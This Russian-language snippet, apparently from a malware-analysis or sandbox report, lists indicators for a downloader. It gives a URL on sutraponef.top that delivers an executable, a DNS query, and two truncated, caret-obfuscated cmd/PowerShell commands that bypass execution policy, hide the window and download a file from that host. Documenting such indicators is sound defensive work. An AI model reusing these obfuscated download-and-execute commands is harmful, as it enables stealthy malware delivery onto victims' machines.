Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^wERsHEll^.Exe -EX^EcUTI^O^NpoliCy ^bY^pAs^S^ -n^OP^rOfi^l^E -W^IND^O^w^S^tY^le ^H^Id^DEN (ne^w-objEc^T^ ^sySTE^M^.net.WeBCl^Ie^Nt^).dOw^n^lOad^fIlE('http://sutraponef.to...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "P^O^wERsHEll^.Exe -EX^EcUTI^O^NpoliCy ^bY^pAs^S^ -n^OP^rOfi^l^E -W^IND^O^w^S^tY^le ^H^Id^DEN (ne^w-objEc^T^ ^sySTE^M^.net.WeBCl^Ie^Nt^).dOw^n^lOad^fIlE('http://sutraponef.to...' (со скрытым окном)